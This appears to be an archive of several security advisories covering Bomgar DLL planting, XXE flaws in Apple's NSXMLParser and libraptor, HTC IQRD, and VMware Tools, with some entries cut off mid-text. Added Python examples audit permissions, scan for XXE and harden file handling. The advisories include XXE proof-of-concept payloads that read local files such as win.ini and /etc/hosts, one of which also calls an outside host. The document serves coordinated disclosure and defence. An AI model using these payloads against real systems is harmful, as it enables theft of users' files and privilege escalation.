Bomgar Remote Support - Local Privilege Escalation (CVE-2017-5996)

2017-10-26 Thread VSR Advisories

   Virtual Security Research, LLC.
  https://www.vsecurity.com/
  Security Advisory


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Advisory Name: Bomgar Remote Support - Local Privilege Escalation
 Release Date: 2017-10-26
  Application: Bomgar Remote Support
     Versions: 15.2.x before 15.2.3
               16.1.x before 16.1.5
               16.2.x before 16.2.4
 Severity: High/Medium
   Author: Robert Wessen 
   Author: Mitch Kucia 
Vendor Status: Update Released [2]
CVE Candidate: CVE-2017-5996
    Reference: https://www.vsecurity.com/download/advisories/20171026-1.txt

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Product Description
~-~
From Bomgar's website [1]: "The fastest, most secure way for experts to access
and support the systems that need them."


Vulnerability Overview
~~
In mid-January 2017, VSR identified a privilege escalation vulnerability in the
Bomgar Remote Support agent which can be used to escalate from any unprivileged
local user to NT AUTHORITY\SYSTEM on Microsoft Windows 7 systems. The
vulnerability originates from a service running as NT AUTHORITY\SYSTEM being
executed from a folder with excessive permissions. Exploitation requires a
remote support representative to connect to the affected system, since the
planted library is loaded when the agent establishes a session.


Vulnerability Details
~---~
The Bomgar Remote Support agent enables remote support personnel to establish
screen sharing, access a command shell, and perform system administration tasks
on machines with the agent installed. By default the agent installs a service
that runs as the Windows LocalSystem account and creates a folder at
C:\ProgramData\bomgar-ssc-0xh..h (where each h is a hex digit). The service
binary is executed from this folder, and the directory an executable is loaded
from is the first location the Windows loader searches when resolving a DLL
that is neither already loaded nor a known DLL. The default permissions on
C:\ProgramData grant all users, even unprivileged ones, the right to create
files and folders (BUILTIN\Users:(CI)(WD,AD,WEA,WA) in icacls output), and a
file created there is owned by its creator with full control. These
permissions are inherited by sub-directories unless explicitly overridden, and
the agent installer does not override them, so a DLL planting/hijack is
possible.

Because the folder is writable by all users, a Trojan horse DLL with the same
name as one of the libraries the service requests but does not ship can be
placed inside C:\ProgramData\bomgar-ssc-0xh..h. When a remote support
representative next connects to the host, the malicious library is loaded into
the service and code executes as NT AUTHORITY\SYSTEM. Which library names are
requested but absent can be observed with a file-system monitor such as Process
Monitor (NAME NOT FOUND results for .dll paths under the agent folder) while a
session is being established.
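The permission check a practitioner wants for this class of issue, as an added example that is not part of the advisory and not Bomgar's code: a Python parser for icacls output that flags directories in which a low-privileged principal may create files. The icacls text and the directory name example-svc are constructed for illustration; against a real system, run icacls on the agent folder and feed its output to parse_icacls.

```python
"""Added example (not from the VSR advisory or from Bomgar): find directories in
which a low-privileged principal may create files, from `icacls` output.

The directory a service binary runs from is the first place the Windows loader
looks for a DLL the binary requests, so a service directory that inherits the
default C:\\ProgramData rights is a DLL-planting target. The icacls text below
is constructed sample output for a hypothetical service directory.
"""
import re

# Groups every interactive local user belongs to.
LOW_PRIV_PRINCIPALS = {
    "BUILTIN\\Users",
    "NT AUTHORITY\\Authenticated Users",
    "Everyone",
}

# icacls rights that allow creating a new file or folder inside a directory:
# F (full), M (modify), W (write), WD (write data / create files),
# AD (append data / create subdirectories).
PLANT_RIGHTS = {"F", "M", "W", "WD", "AD"}

INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}

ACE_RE = re.compile(r"^(?P<who>[^:]+):(?P<flags>(?:\([^)]*\))+)$")


def parse_icacls(path, output):
    """Parse `icacls <path>` output into a list of (principal, rights, inherit_flags).

    icacls prints the path followed by the first ACE on one line, one ACE per
    indented line after that, and a 'Successfully processed' trailer.
    """
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):
            line = line[len(path):].strip()
        match = ACE_RE.match(line)
        if not match:
            continue
        groups = re.findall(r"\(([^)]*)\)", match.group("flags"))
        inherit = {g for g in groups if g in INHERIT_FLAGS}
        rights = set()
        for g in groups:
            if g not in INHERIT_FLAGS:
                rights.update(r.strip() for r in g.split(","))
        aces.append((match.group("who").strip(), rights, inherit))
    return aces


def plantable_by_low_priv(aces):
    """Return [(principal, sorted rights)] for allow ACEs that let a
    low-privileged principal create entries in this directory.

    Inherit-only (IO) entries apply to children, not to the directory itself;
    DENY entries never grant anything.
    """
    hits = []
    for who, rights, inherit in aces:
        if "DENY" in rights or "IO" in inherit:
            continue
        if who in LOW_PRIV_PRINCIPALS and rights & PLANT_RIGHTS:
            hits.append((who, sorted(rights)))
    return hits


# Constructed sample: a service directory that inherited the ProgramData defaults.
SAMPLE_PATH = r"C:\ProgramData\example-svc"
SAMPLE_ICACLS = r"""
C:\ProgramData\example-svc NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                           BUILTIN\Administrators:(I)(OI)(CI)(F)
                           CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                           BUILTIN\Users:(I)(OI)(CI)(RX)
                           BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)

Successfully processed 1 files; Failed processing 0 files
"""


def audit_sample():
    """Run the check over the constructed sample; an empty list means safe."""
    return plantable_by_low_priv(parse_icacls(SAMPLE_PATH, SAMPLE_ICACLS))


if __name__ == "__main__":
    for who, rights in audit_sample():
        print(f"{SAMPLE_PATH}: {who} may plant files ({','.join(rights)})")
```

The inherit-only CREATOR OWNER entry is deliberately ignored: it grants nothing on the directory itself, but it is the reason a planted DLL ends up fully controlled by the unprivileged user who dropped it.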


Versions Affected
~---~
The issue was originally discovered in version 16.1.1, although it has likely
existed since at least version 14. All testing was performed exclusively on
Windows 7; however, the vulnerability is suspected to be present on all
supported Windows platforms.


Vendor Response
~-~
The following timeline details Bomgar's response to the reported issue:

2017-02-05    VSR contacted Bomgar via several public email addresses to file a
  security report.

2017-02-06    Bomgar replied, VSR provided additional details on the
  vulnerability and Bomgar began internal triage.

2017-02-13    Bomgar confirmed reproduction and indicated a hotfix will be
  available to select customers on 2017-02-17. Patch for all
  customers will be available at a later date.

2017-03-28    Bomgar releases patch in Remote Support versions 15.2.3 [2],
  16.1.5 [3], and 16.2.4 [4].

2017-10-26    VSR advisory released.


Recommendation
~~
Upgrade all client installs to the latest version of Bomgar Remote Support
software as soon as possible.


Common Vulnerabilities and Exposures (CVE) Information
~~
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2017-5996 to this issue. This is a candidate for
inclusion in the CVE list (https://cve.mitre.org), which standardizes
names for security problems.


Acknowledgments
~--~
Thanks to the Bomgar development team for a prompt response, confirmation, and
patch.


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

References:

1. https://www.bomgar.com/

2. https://www.bomgar.com/support/changelog/remote-support-15-2-3

3. https://www.bomgar.com/support/changelog/remote-support-16-1-5

4. https://www.bomgar.com/support/changelog/remote-support-1624


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

This advisory is distributed for educational purposes only with the sincere
hope that it will help promote public safety.  This advisory comes with
absolutely NO WARRANTY; not even the implied warranty of merchantability or
fitness for a particular purpose.  Neither Virtual Security Research, LLC nor
the author accepts any liability for any direct, indirect, or consequential
loss or damage arising from use of, or reliance on, this information.

See the VSR disclosure policy for more information on our responsible
disclosure practices:
  http://www.vsecurity.com/company/disclosure

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Apple iOS / OSX Foundation NSXMLParser XML eXternal Entity (XXE) Flaw

2014-09-19 Thread VSR Advisories


 VSR Security Advisory
   http://www.vsecurity.com/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Advisory Name: Apple Foundation NSXMLParser XML eXternal Entity (XXE) Flaw
 Release Date: 2014-09-17
  Application: Apple iOS Foundation Framework
   Apple OS X Foundation Framework
 Versions: iOS 7.0, 7.1, OS X 10.9 - 10.9.4
 Severity: High
   Author: George D. Gal ggal (at) vsecurity.com
Vendor Status: Fix Available
CVE Candidate: CVE-2014-4374
Reference: http://www.vsecurity.com/resources/advisory/20140917-1/
   http://support.apple.com/kb/HT1222

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Product Description
~-~
From [1]:
  Xcode includes software development kits (SDKs) that enable you to create
  applications that run on specific versions of iOS or OS X, including
  versions different from the one you are developing on. This technology
  lets you build a single binary that takes advantage of new features when
  running on a system that supports them, and gracefully degrades when
  running on an older system. Some Apple frameworks automatically modify
  their behavior based on the SDK an application is built against for
  improved compatibility.


Vulnerability Overview
~~
In May 2014, VSR identified a vulnerability in versions 7.0 and 7.1 of the iOS
SDK whereby the NSXMLParser class resolves XML external entities by default,
despite documentation which indicates otherwise. In addition, the setting
intended to change the behaviour of external entity resolution
(setShouldResolveExternalEntities:) appears to be non-functional.

This class of vulnerability, commonly known as an XXE (XML eXternal Entity)
attack, lets an attacker who controls XML input use the parser to carry out
attacks ranging from network port scanning and denial of service to
information disclosure and, potentially, retrieval of local files through
entities such as file:///.

Further review also revealed that the Foundation Framework used in OS X
10.9.x is also vulnerable.

The severity of this vulnerability varies with how the parsed XML is handled.
Where the application does not reflect user-influenced XML back to the
attacker, retrieval of files may be limited, but external HTTP entities can
still be used to conduct port scans from the device. Where core iOS
applications transmit XML over plaintext protocols, those exchanges could be
intercepted and modified to leak the contents of any file on the mobile device
that the application can read. For App Store applications the files which can
be accessed may be limited to those within the individual application's
sandbox container; on jailbroken devices, any file on the filesystem may be
readable.


Vulnerability Details
~---~

Apple's NSXMLParser documentation [2] indicates that external entity
resolution is disabled in the parser by default. However, inspection of
multiple applications running on iOS 7.0 and 7.1 shows that they resolve
external entities by default, and continue to do so even when entity
resolution is explicitly disabled as shown below:

    [nsXmlParser setShouldResolveExternalEntities:NO];

The following source code demonstrates the flaw:


#import <Foundation/Foundation.h>

- (void)doParse:(NSData *)data {

    // create and init NSXMLParser object
    NSXMLParser *nsXmlParser = [[NSXMLParser alloc] initWithData:data];

    // Why does the following not even work!?
    [nsXmlParser setShouldResolveExternalEntities:NO];

    // create and init our delegate
    VSRParser *parser = [[VSRParser alloc] initXMLParser];

    // set delegate
    [nsXmlParser setDelegate:parser];

    // parsing...
    BOOL success = [nsXmlParser parse];

    // test the result
    if (success) {
        NSLog(@"No errors");
        NSMutableArray *stuff = [parser tests];
    } else {
        NSLog(@"Error parsing document!");
    }

    [parser release];
    [nsXmlParser release];
}


When parsing the XML input shown below, the parser attempts to perform network
name resolution and fetch the resource defined by the http entity:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottag [
<!ENTITY http SYSTEM "http://iossdk-xxe.apt.vsecurity.org/">
<!ENTITY file SYSTEM "file:///etc/hosts">
]>
<test>
<vsr>
<tag1>&file;</tag1>
<tag2>&http;</tag2>
</vsr>
</test>

The following DNS and web server log entries demonstrate the attempts to
resolve &http;:

2014-05-19_13:26:28.31088 ...  iossdk-xxe.apt.vsecurity.org

XX.XX.XX.XX - - [19/May/2014:09:26:28 -0400] GET /xxe HTTP/1.0 404 446
- -


In more serious exploitation scenarios, plaintext XML communications between
a server and an iOS mobile application or OS X client application could be
intercepted and modified in transit to reference a file present on the client
device. If the client reflects the parsed value in subsequent communications
or error messages, the contents of files stored on the device could be leaked
to the attacker.

Versions Affected
~---~

HTC IQRD Android Permission Leakage (CVE-2012-2217)

2012-04-23 Thread VSR Advisories
 VSR Security Advisory
   http://www.vsecurity.com/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: HTC IQRD Android Permission Leakage
 Release Date: 2012-04-20
  Application: IQRD on HTC Android Phones
   Author: Dan Rosenberg drosenberg (at) vsecurity.com
Vendor Status: Patch Released
CVE Candidate: CVE-2012-2217
Reference: http://www.vsecurity.com/resources/advisory/20120420-1/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
---
The IQRD service is HTC's implementation of a Carrier IQ porting layer on
several HTC Android phones.  Carrier IQ is a data collection framework that may
be deeply integrated into the Android application stack in order to provide
cell carriers with detailed metrics data on device and network activity [1].
To complete the integration of Carrier IQ on a specific device, phone
manufacturers provide a porting layer that allows the Carrier IQ service to
perform specific actions that may vary by device.


Vulnerability Details
-
On December 22nd, 2011, VSR identified a vulnerability in IQRD.  The IQRD
service listens on a TCP socket bound to port 2479 on the local host.  This
socket is intended to allow the Carrier IQ service to request device-specific
functionality from IQRD.  Unfortunately, there is no restriction on, or
validation of, which applications may request services over this socket.  As a
result, any application holding the android.permission.INTERNET permission may
connect to it and send specially crafted messages in order to perform
potentially malicious actions.

In particular, it is possible for malicious applications to:

1. Trigger UI popup messages

2. Generate tones

3. Send arbitrary outbound SMS messages that do not appear in a user's
   outbox, facilitating toll fraud

4. Retrieve a user's Network Access Identifier (NAI) and corresponding
   password, potentially allowing rogue devices to impersonate the user
   on a CDMA network


Versions Affected
-
The issue is confirmed to affect the HTC EVO 4G, HTC EVO Design 4G, EVO Shift
4G, HTC EVO 3D, HTC EVO View 4G, and HTC Hero on Sprint; and the HTC Vivid on
ATT.


Vendor Response
---
The following timeline details HTC's response to the reported issue:

2011-12-22    Vulnerability reported to HTC
2011-12-28    HTC confirms receipt, replies that fix is planned for early 2012
2012-03-10    VSR requests status update
2012-03-16    HTC confirms fix has been published
2012-03-26    HTC requests clarification on finding
2012-03-26    VSR provides clarification on finding, requests confirmation on
              status of fix
2012-04-02    HTC provides confirmation of fix, requests further clarification
2012-04-02    VSR provides clarification on finding
2012-04-12    VSR provides draft advisory to HTC
2012-04-13    HTC provides corrections to advisory, requests disclosure date
2012-04-20    Coordinated disclosure


Recommendation
--

HTC has issued a fix that will typically be provided as an OTA update by
affected cell carriers.  If the update has not automatically been installed, it
is possible to retrieve the update manually by navigating to Menu > Settings
> System Updates > HTC Software Update > Check Now.

The following software versions on Sprint are confirmed to resolve this issue:

HTC EVO 4G:          4.67.651.3
HTC EVO Design 4G:   2.12.651.5
HTC EVO Shift 4G:    2.77.651.3
HTC EVO 3D:          2.17.651.5
HTC EVO View 4G:     2.23.651.1

The following software versions on ATT are confirmed to resolve this issue:

HTC Vivid:  3.26.502.56


All affected devices except the HTC Hero have received an over-the-air update.
HTC and Sprint have declined to update the HTC Hero, citing its 2009 release,
minimal current usage, and lack of malicious applications in the Android
Marketplace exploiting this vulnerability.

Users should be aware that devices that no longer receive updates due to
switching carriers may remain vulnerable.


Common Vulnerabilities and Exposures (CVE) Information
--
The Common Vulnerabilities and Exposures (CVE) project has assigned the number
CVE-2012-2217 to this issue.  This is a candidate for inclusion in the CVE list
(http://cve.mitre.org), which standardizes names for security problems.


Acknowledgements

Thanks to HTC for their response and fix.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References:

1. Carrier IQ
   http://www.carrieriq.com


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

This advisory is distributed for educational purposes only with the sincere
hope that it will help promote public safety.  This advisory comes with
absolutely NO WARRANTY; not even the implied 

CVE-2012-0037: libraptor - XXE in RDF/XML File Interpretation (Multiple office products affected)

2012-03-27 Thread VSR Advisories


 VSR Security Advisory
   http://www.vsecurity.com/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Advisory Name: libraptor - XXE in RDF/XML File Interpretation
 Release Date: 2012-03-24
 Applications: libraptor / librdf (versions 1.x and 2.x)
Also Affected: OpenOffice 3.x, LibreOffice 3.x, AbiWord, KOffice
   Author: tmorgan {a} vsecurity * com
Vendor Status: Patches available; major downstream vendors
   and operating system distributions notified
CVE Candidate: CVE-2012-0037
Reference: http://www.vsecurity.com/resources/advisory/20120324-1/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Product Description
~-~
Raptor is a free software / Open Source C library that provides a set of
 parsers and serializers that generate Resource Description Framework (RDF)
 triples by parsing syntaxes or serialize the triples into a syntax. The
 supported parsing syntaxes are RDF/XML, N-Quads, N-Triples, TRiG, Turtle, RSS
 tag soup including all versions of RSS, Atom 1.0 and 0.3, GRDDL and
 microformats for HTML, XHTML and XML and RDFa. The serializing syntaxes are
 RDF/XML (regular, and abbreviated), Atom 1.0, GraphViz, JSON, N-Quads,
 N-Triples, RSS 1.0 and XMP. -- libraptor web site [1]

libraptor is a component of librdf[2] which is used by a variety of open source
software to interpret Resource Description Framework (RDF) [3] formats.


Vulnerability Overview
~~
In December 2011, VSR identified a vulnerability in multiple open source office
products (including OpenOffice, LibreOffice, KOffice, and AbiWord) due to unsafe
interpretation of XML files with custom entity declarations. Deeper analysis
revealed that the vulnerability was caused by acceptance of external entities by
the libraptor library, which is used by librdf and is in turn used by these
office products.

In the context of office applications, these vulnerabilities could allow for XML
External Entity (XXE) attacks resulting in file theft and a loss of user privacy
when opening potentially malicious ODF documents.  For other applications which
depend on librdf or libraptor, potentially serious consequences could result
from accepting RDF/XML content from untrusted sources, though the impact may
vary widely depending on the context.


Vulnerability Details
~---~
Open Document Format (ODF) files consist of a collection of several different
files stored in a ZIP archive.  Included in this set is a manifest.rdf file
which is formatted according to the RDF/XML representation.  The RDF format is
intended to be used for storing metadata associated with specific document
elements.  The manifest.rdf file can reference secondary RDF files within the
ODF file as well as external document schemas.

The RDF/XML parser used by the affected office products (libraptor, reached
through librdf) accepts DTD declarations inside the RDF files themselves.  In
addition, the parser resolves external entities, which may reference arbitrary
local files as well as HTTP and FTP resources.

For instance, the following evil.rdf file was created within a valid ODF text
archive (.odt file) which was referenced by the internal manifest.rdf file:


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE rdf [
   <!ENTITY file SYSTEM "file:///c:/windows/win.ini">
]>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
  <rdf:Description rdf:about="content.xml#id1265690860">
    <ns0:comment xmlns:ns0="http://www.w3.org/2000/01/rdf-schema#">&file;</ns0:comment>
  </rdf:Description>
</rdf:RDF>



Upon opening the malicious .odt file in OpenOffice for Windows, the
c:\windows\win.ini file was read and included in the document metadata.  Upon
saving the document, this metadata was included literally in the resulting
evil.rdf file (within the .odt):

<?xml version="1.0" encoding="utf-8"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
  <rdf:Description rdf:about="content.xml#id1265690860">
    <ns1:comment xmlns:ns1="http://www.w3.org/2000/01/rdf-schema#">; for
16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1
</ns1:comment>
  </rdf:Description>
</rdf:RDF>

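The detection that both this advisory and the NSXMLParser advisory above call for, as an added example that is neither VSR's nor the Raptor project's code: a Python scanner that walks the XML members of an ODF package and reports external DTDs, external entity declarations and attempted expansions without resolving any of them. The .odt is constructed in memory from the evil.rdf above; its other members are minimal stand-ins rather than a real document.

```python
"""Added example (not from the VSR advisories, Apple, or the Raptor project):
flag external entity declarations in the XML members of an ODF package without
resolving any of them.

Expat reports DOCTYPE and ENTITY declarations as events and only fetches an
external entity when the ExternalEntityRefHandler decides to, so the scanner
can record "file:///c:/windows/win.ini" without ever opening win.ini. The .odt
archive is built in memory from the evil.rdf shown in the advisory; its other
members are minimal stand-ins, not a real document.
"""
import io
import xml.parsers.expat
import zipfile

XML_MEMBER_SUFFIXES = (".xml", ".rdf")


def find_external_entities(xml_bytes):
    """Return (kind, name, location) findings for external DTDs, external entity
    declarations, and attempts to expand an external entity in content."""
    findings = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        if sysid or pubid:
            findings.append(("external-dtd", name, sysid or pubid))

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        if sysid or pubid:
            findings.append(("external-entity-decl", name, sysid or pubid))

    def on_external_ref(context, base, sysid, pubid):
        # Record the expansion attempt and return 1 so expat continues unresolved.
        findings.append(("external-entity-ref", context, sysid or pubid))
        return 1

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(xml_bytes, True)
    return findings


def scan_odf(archive_bytes):
    """Map each XML/RDF member of the package to its findings (members without findings are omitted)."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(XML_MEMBER_SUFFIXES):
                continue
            try:
                findings = find_external_entities(zf.read(name))
            except xml.parsers.expat.ExpatError as exc:
                findings = [("parse-error", name, str(exc))]
            if findings:
                report[name] = findings
    return report


# The advisory's evil.rdf, reconstructed.
EVIL_RDF = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE rdf [
   <!ENTITY file SYSTEM "file:///c:/windows/win.ini">
]>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
  <rdf:Description rdf:about="content.xml#id1265690860">
    <ns0:comment xmlns:ns0="http://www.w3.org/2000/01/rdf-schema#">&file;</ns0:comment>
  </rdf:Description>
</rdf:RDF>
"""


def build_sample_odt():
    """Constructed minimal .odt: mimetype, content.xml, manifest.rdf and evil.rdf."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        zf.writestr("content.xml",
                    '<?xml version="1.0"?><office:document-content '
                    'xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"/>')
        zf.writestr("manifest.rdf",
                    '<?xml version="1.0"?><rdf:RDF '
                    'xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"/>')
        zf.writestr("evil.rdf", EVIL_RDF)
    return buf.getvalue()


if __name__ == "__main__":
    for member, findings in scan_odf(build_sample_odt()).items():
        for kind, name, where in findings:
            print(f"{member}: {kind} {name} -> {where}")
```

The same handlers are the right place to reject a document outright in an ingestion pipeline: a parser that has no business resolving anything should treat any external-dtd or external-entity-decl finding as a hard failure rather than a warning.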

The malicious XML entities could also include URLs to attacker-controlled
HTTP or FTP resources.  This would allow an attacker to determine when a
document was opened, potentially resulting in reduced privacy.  However, based
on current analysis of the affected office applications, the most serious attack
scenario is likely to be:

1. Attacker posts a malicious file on a web site or sends file to victim.  The
file contains a form for the victim to fill out and return to the attacker.

2. Victim fills out the form, saves it, sends it back to the attacker.

3. Attacker is able to read the contents of any stolen files as embedded
metadata, simply by unzipping the 

VMware Tools Multiple Vulnerabilities

2011-06-06 Thread VSR Advisories


 VSR Security Advisory
   http://www.vsecurity.com/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: VMware Tools Multiple Vulnerabilities
 Release Date: 2011-06-03
  Application: VMware Guest Tools
 Severity: High
   Author: Dan Rosenberg drosenberg (at) vsecurity.com
Vendor Status: Patch Released [2]
CVE Candidate: CVE-2011-1787, CVE-2011-2145, CVE-2011-2146
Reference: http://www.vsecurity.com/resources/advisory/20110603-1/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
---
From [1]:

 VMware Tools is a suite of utilities that enhances the performance of the
  virtual machine's guest operating system and improves management of the
  virtual machine. Without VMware Tools installed in your guest operating
  system, guest performance lacks important functionality.


Vulnerability Overview
--
On February 17th, VSR identified multiple vulnerabilities in VMware Tools, a
suite of utilities shipped by VMware with multiple product offerings, as well
as by open-source distributions as the open-vm-tools package.  The first of
these issues results in a minor information disclosure vulnerability, while the
second two issues may result in privilege escalation in a VMware guest with
VMware Tools installed.

Product Background
--
VMware Tools includes mount.vmhgfs, a setuid-root utility that allows
unprivileged users in a guest VM to mount HGFS shared folders.  Also shipped
with VMware Tools is vmware-user-suid-wrapper, a setuid-root utility which
handles initial setup to prepare for running vmware-user, which grants users
access to other utilities included with VMware Tools.

Vulnerability Details
-

CVE-2011-2146:

The mount.vmhgfs utility makes a call to stat() to check for the existence and
type (file, directory, etc.) of the user-supplied mountpoint, and provides an
error message if the provided argument does not exist or is not a directory.
Because mount.vmhgfs is setuid-root, a local attacker can leverage this
behavior to identify if a given path exists in the guest operating system and
whether it is a file or directory, potentially violating directory permissions.

CVE-2011-1787:

The mount.vmhgfs utility checks that the user-provided mountpoint is owned by
the user attempting to mount an HGFS share prior to performing the mount.
However, a race condition (time-of-check/time-of-use) exists between the time
this check is performed and the time the mount is performed, during which the
mountpoint path can be replaced.  Successful exploitation allows a local
attacker to mount HGFS shares over arbitrary, potentially root-owned
directories, subsequently allowing privilege escalation within the guest.

CVE-2011-2145:

The vmware-user-suid-wrapper utility attempts to create a directory at
/tmp/VMwareDnD.  Next, it makes calls to chown() and chmod() to make this
directory root-owned and world-writable.  By placing a symbolic link at the
location of this directory, vmware-user-suid-wrapper will cause the symbolic
link target to become world-writable, allowing local attackers to escalate
privileges within the guest.  Only FreeBSD and Solaris versions of VMware Tools
are affected.
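Both patterns above, as an added example that is not VMware's code and not from the advisory: a Python model of the unsafe mkdir/chmod and check-then-use sequences beside descriptor-based replacements, run against a scratch directory. The directory and symlink names are constructed for the demonstration; VMwareDnD stands in for the real path and victim-dir for a root-owned directory.

```python
"""Added example (not VMware's code or the VSR advisory's): the two unsafe
patterns behind CVE-2011-1787 and CVE-2011-2145, beside descriptor-based
replacements, exercised on a scratch directory.

  * check-then-use: stat(path) to verify ownership, then act on the path again,
    leaves a window in which the path can be swapped.  Fix: open the directory
    once with O_NOFOLLOW|O_DIRECTORY, fstat the descriptor, act on the descriptor.
  * mkdir(path) followed by chown/chmod(path): if mkdir failed because a
    symlink already sits there, chmod follows the link and loosens the target.
    Fix: treat a pre-existing path as an error and change the mode through a
    descriptor opened with O_NOFOLLOW.

POSIX only. Every path used here is created under a temporary directory, and the
"victim" directory merely stands in for a root-owned one.
"""
import os
import stat
import tempfile


def unsafe_make_world_writable(path):
    """Mirror of the mkdir-then-chmod sequence from the advisory; chmod resolves symlinks."""
    try:
        os.mkdir(path, 0o755)
    except FileExistsError:
        pass                          # whatever is already there is trusted blindly
    os.chmod(path, 0o1777)            # follows a symlink planted at `path`


def safe_make_world_writable(path):
    """Create-or-fail, then set the mode through a descriptor that refuses symlinks."""
    os.mkdir(path, 0o1777)            # raises FileExistsError if anything is already there
    fd = os.open(path, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        os.fchmod(fd, 0o1777)         # re-apply: mkdir's mode is subject to umask
    finally:
        os.close(fd)


def open_dir_owned_by_caller(path):
    """Open a directory the caller owns for later use by descriptor (e.g. as a
    mount target). Symlinks, non-directories and foreign ownership are rejected,
    and the check and the later use refer to the same inode, so nothing can be
    swapped in between."""
    try:
        fd = os.open(path, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    except OSError as exc:            # ELOOP for a symlink, ENOTDIR for a file
        raise PermissionError(f"refusing {path}: {exc.strerror}") from exc
    st = os.fstat(fd)
    if st.st_uid != os.getuid():
        os.close(fd)
        raise PermissionError(f"refusing {path}: owned by uid {st.st_uid}, not {os.getuid()}")
    return fd


def demo():
    """Return (victim mode after the unsafe helper, safe helper refused?, safe open refused?)."""
    with tempfile.TemporaryDirectory() as root:
        victim = os.path.join(root, "victim-dir")
        os.mkdir(victim, 0o700)
        link = os.path.join(root, "VMwareDnD")      # attacker plants this before the tool runs
        os.symlink(victim, link)

        unsafe_make_world_writable(link)
        victim_mode = stat.S_IMODE(os.stat(victim).st_mode)

        try:
            safe_make_world_writable(link)
            safe_refused = False
        except FileExistsError:
            safe_refused = True

        try:
            os.close(open_dir_owned_by_caller(link))
            open_refused = False
        except PermissionError:
            open_refused = True

        os.close(open_dir_owned_by_caller(victim))   # a genuine directory we own is fine
        return victim_mode, safe_refused, open_refused


if __name__ == "__main__":
    print(demo())
```

demo() returns (0o1777, True, True): the naive sequence turned the private victim directory world-writable through the planted link, while both hardened helpers refused to touch it.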

Versions Affected
-

VMware's advisory [2] indicates the following product versions are affected:

   VMware       Product   Running   Replace with/
   Product      Version   on        Apply Patch
   ===========  ========  ========  ========================
   vCenter      any       Windows   not affected

   Workstation  7.1.x     Linux     7.1.4 or later*
   Workstation  7.1.x     Windows   7.1.4 or later*

   Player       3.1.x     Linux     3.1.4 or later*
   Player       3.1.x     Windows   3.1.4 or later*

   AMS          any       any       not affected

   Fusion       3.1.x     OSX       Fusion 3.1.3 or later*

   ESXi         4.1       ESXi      ESXi410-201104402-BG*
   ESXi         4.0       ESXi      ESXi400-201104402-BG*
   ESXi         3.5       ESXi      ESXe350-201105402-T-SG*

   ESX          4.1       ESX       ESX410-201104401-SG*
   ESX          4.0       ESX       ESX400-201104401-SG*
